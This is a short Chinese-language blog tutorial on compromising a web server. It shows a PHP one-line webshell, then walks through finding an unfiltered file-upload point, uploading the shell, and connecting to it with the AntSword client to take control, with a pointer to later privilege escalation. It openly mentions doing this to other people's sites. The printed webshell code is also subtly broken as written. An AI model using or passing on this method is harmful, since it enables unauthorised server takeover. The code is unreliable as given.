1.编写一句话木马

<?php
@eval(['jacky']);
?>

2.寻找服务器上传点

以我的博客为例
如图

我的博客里有一个上传附件的功能

3.利用文件上传漏洞（检查有无文件上传格式过滤、大小限制）

发现里面没有做过滤，直接上传一句话木马(假如进了别人网站需注意上传文件是否限制php或者jpg格式的大小)

4.打开中国蚁剑

中国蚁剑在资源中心，安全无后门，可到[资源中心]下载(http://www.jacky666.top:8090/s/download)

5.右键添加数据

输入url地址，url指的是一句话木马上传点的绝对路径

输入连接密码，连接密码指的是一句话木马里面[ ]的字符

连接类型为php（若为jsp、asp木马，可选择对应的类型）

连接成功，已经通过木马获得服务器的权限（但是有些权限不足，需要通过其他方法进行提权）